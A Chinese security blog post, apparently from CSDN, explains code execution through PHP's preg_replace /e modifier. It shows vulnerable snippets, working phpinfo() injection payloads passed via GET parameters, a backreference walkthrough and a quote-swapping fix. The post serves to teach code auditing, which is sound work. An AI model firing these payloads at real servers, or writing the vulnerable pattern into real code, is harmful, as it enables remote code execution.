preg_replace在/e模式下的代码执行

已于 2024-04-23 02:50:59 修改
阅读量1.1k 收藏 20
点赞数 27
分类专栏: php 代码审计 文章标签: php 网络安全 web安全 安全
于 2024-04-23 02:47:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59053674/article/details/138101181
版权

版本

  • php5.5.0以下

前置知识

有如下代码:

<?php preg_replace("/test/e",$_GET["a"],"jutst test");?>

意为在 “this is a test” 字符串中找到 “test”,并将其替换为通过$_GET["a"]获取的代码执行结果

也就是说只要提交GET参数“a”的内容为php代码,即可实现远程代码执行,比如提交:

?a=phpinfo();

便会回显phpinfo页面

案例

一个很有意思的案例:

<?php
​
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
​
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
?>

如果能够代码执行,那么代码相当于:

eval('strtolower("\\1");')

在这里,\\1在转义后即为\1,其在正则中有自己的含义:

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 '\n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数。

有点抽象,说人话就是,\几,就匹配第几个

这里的 \1 实际上指定的是第一个子匹配项,这里如果GET传参:

?.*={${phpinfo()}}

那么正则语句就变成了:

preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

而我们都知道,这样传参的话,参数名中的.是非法字符,会被替换为_,所以我们要做的就是换一个正则表达式,让其匹配到 {${phpinfo()}} 即可实现代码执行,而\S恰好能够实现,所以最终实现代码执行的payload为:

?\S*={${phpinfo()}}

解释一下这个正则:

[\s]表示,只要出现空白就匹配
​
[\S]表示,非空白就匹配
​
那么它们的组合[\s\S],表示所有的都匹配
​
"."是不会匹配换行的,所有出现有换行匹配的时候,就习惯使用[\s\S]来完全通配模式。

这样是可以执行phpinfo()的

再解释一下为什么要匹配到 {${phpinfo()}} 或者 ${phpinfo()} ,才能执行 phpinfo 函数:

这是利用了 php可变变量的原因,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果,单引号中的变量不会被处理,所以这里的\1可解析变成{${phpinfo()}}

在此情况下,花括号 {} 被用于指示 PHP 需要解析一个复杂或动态表达式,而通过使用 ${} 结构,代码试图动态地调用 phpinfo() 函数

而{${phpinfo()}} 中的 phpinfo() 会被当做变量先执行,执行后,即变成 ${1} (phpinfo()成功执行返回true)

接下来一步一步分析:

var_dump(phpinfo()); // 结果:布尔 true
​
var_dump(strtolower(phpinfo()));// 结果:字符串 '1'
​
var_dump(preg_replace('/(.*)/ie','1','{${phpinfo()}}'));// 结果:字符串'11'
​
var_dump(preg_replace('/(.*)/ie','strtolower("\\1")','{${phpinfo()}}'));// 结果:空字符串''
​
var_dump(preg_replace('/(.*)/ie','strtolower("{${phpinfo()}}")','{${phpinfo()}}'));// 结果:空字符串''
​
这里的'strtolower("{${phpinfo()}}")'执行后相当于 strtolower("{${1}}") 又相当于 strtolower("{null}") 又相当于 '' 空字符串var_dump(phpinfo()); // 结果:布尔 true
​
var_dump(strtolower(phpinfo()));// 结果:字符串 '1'
​
var_dump(preg_replace('/(.*)/ie','1','{${phpinfo()}}'));// 结果:字符串'11'
​
var_dump(preg_replace('/(.*)/ie','strtolower("\\1")','{${phpinfo()}}'));// 结果:空字符串''
​
var_dump(preg_replace('/(.*)/ie','strtolower("{${phpinfo()}}")','{${phpinfo()}}'));// 结果:空字符串''
​
这里的'strtolower("{${phpinfo()}}")'执行后相当于 strtolower("{${1}}") 又相当于 strtolower("{null}") 又相当于 '' 空字符串

有了上面的例子,同理:

<?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("\1")', $_GET["h"]);
?>

如果GET方法提交请求:

?h=[php]{${phpinfo()}}[/php]

phpinfo()也会被执行

总结

preg_replace \e 模式存在代码执行

如果 replacement中是双引号的,可引申出上面的漏洞

针对上面双引号引发的漏洞的防御方法也很简单,比如:

将'strtolower("\\1")'修改为"strtolower('\\1')"
​
将'test("\1")' 修改为"test('\1')"

这样{${phpinfo()}}或${phpinfo()}就会被当做一个普通的字符串处理(单引号中的变量不会被处理)

tips:文章部分内容取材自网络,如有侵权请联系作者删除

Yuy0ung
关注
  • 27
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
php preg replace e,关于 preg_replace 危险的“/e”修饰符
weixin_33980343的博客
03-10 1291
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。而函数中的 /e 这个修饰符的意思就是让 正则替换之后将 replacement 参数当作 PHP 代码。该用法常在 PHP webshell 中出现。preg_replace ( mixed pattern, mixed replacem...
eregi_replace与preg_replace 函数代码的用法比较
10-30
eregi_replace与preg_replace 函数代码的用法比较
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。 举例: 复制代码 代码如下: <?php preg_replace (“/(</?)(w+)([
PHP安全之慎用preg_replace的/e修饰符
weixin_34318956的博客
06-26 150
PHP以其易用性和可移植性正被广泛应用于WEB开发。然而,在我们使用的过程中,也要十分小心,从随处可见的XSS(新浪微博发送大量垃圾信息事件)到前段时间爆出来的Hash冲突的DDOS攻击,最近,wooyun上面发布了一个关于ThinkPHP框架的漏洞(最新版已经修复),以前也是我用过的第一个框架,昨晚花时间重现了一下,查阅了下程序的原理。本文主要来重现该漏洞,然后分析代码,给出漏洞的原因,用这个漏...
php新版本号废弃 preg_replace /e 修饰符
weixin_33851604的博客
05-11 156
近期serverphp版本号升级到了 5.6  发现出了非常多警告   preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead 一開始没注意。后来发现 非常多这种警告,于是网上查了下 发现 php5.5版本号以上 就废弃了  preg_replace   函数中 /e 这个修饰...
preg_replace的/e修饰符妙用与慎用
senlin1202的博客
03-04 2910
preg_replace执行正则表达式的搜索和替换 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit ] ) 在 subject 中搜索 pattern 模式的匹配项并替换为 replacement 。如果指定了 limit ,则仅替换 limit 个匹配,如果省略
深入研究PHP中的preg_replace代码执行
10-18
主要给大家介绍了关于PHP中preg_replace代码执行的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
在编写PHP模板引擎工具类时,以前常用的一个正则替换函数为 preg_replace(),加上正则修饰符 /e,就能够执行强大的回调函数,实现模板引擎编译(其实就是字符串替换)。 详情介绍参考博文:PHP函数preg_replace() ...
深入研究preg_replace \e模式下的代码执行
paidx0
08-21 2779
深入研究preg_replace代码执行 下面将深入研究 preg_replace /e 模式下的代码执行问题, 其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常非常多,相信看完你也能学到很多 案例分析 <?php function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")',
preg_replace() /e代码执行漏洞
weixin_43749601的博客
01-30 4729
preg_replace() 函数 该函数执行一个正则表达式的搜索和替换。 语法 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。 参数说明: $pattern: 要搜索的模式,可以是字符串或一个字符串数组。 $replacem
ecshop 关于 preg_replace /e 修饰符不安全的几处改动
拾贝壳
06-24 6546
主要集中在 upload/includes/cls_template.php 文件中:   1:line 300 :   原语句:   return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);   修改为:   return preg_replace_callback("/{([^
php preg_replace /e 模式 漏洞分析
quan9i的博客
04-15 3640
在做一道可以进行rce的相关题时,发现很多之前不知道的知识,并且感到这个漏洞很有意思,进行了简单分析,总结如下,希望能对师傅们有帮助
从实战理解代码执行漏洞函数(php
weixin_51692662的博客
08-18 764
php,RCE,漏洞,远程代码安全,代码执行
php代码审计命令执行,代码审计-通过preg_replace函数深入命令执行
weixin_42417004的博客
03-27 358
代码审计day1前言最近开始学习代码审计,刚好mochazz学长的团队红日安全-代码审计小组正在做一个PHP代码审计的项目,该项目会对一道题目进行细致的分析,我觉得很适合新手学习,就跟进他们的项目,对项目中的题目写出我自己的想法。希望能有所进步。题目1这道题的名字叫做蜡烛12345678910111213141516...
PHP代码执行漏洞总结
Jtype的专栏
08-11 737
代码执行函数PHP中可以执行代码的函数。如eval()、assert()、“、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、inclu
php新版本废弃 preg_replace /e 修饰符
热门推荐
云烟阁
12-16 4万+
最近服务器php版本升级到了 5.6  发现出了很多警告   preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead 一开始没注意,后来发现 很多这样的警告,于是网上查了下 发现 php5.5版本以上 就废弃了  preg_replace   函数中 /e 这个修饰符  /e 这个修饰符的
preg_replace在java中_深入研究PHP中的preg_replace代码执行
weixin_35756892的博客
02-19 182
前言本文将深入研究 preg_replace /e 模式下的代码执行问题,其中包括 preg_replace 函数的执行过程分析、正则表达式分析、漏洞触发分析,当中的坑非常多,相信看完本文,你一定会有所收获。下面是 七月火 和 l1nk3r 的分析结果。案例下面先看一个案例,思考如何利用此处的 preg_replace /e 模式执行代码(可以先不看下文分析,自己思考出 payload 试试)。...
preg_replace_all
最新发布
06-06
`preg_replace` 函数会在字符串中使用正则表达式进行替换,并返回替换后的字符串。如果要替换所有匹配项,可以使用 `preg_replace` 函数的第四个参数 `$count`,将其设置为 `$count = -1`,表示替换所有匹配项。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值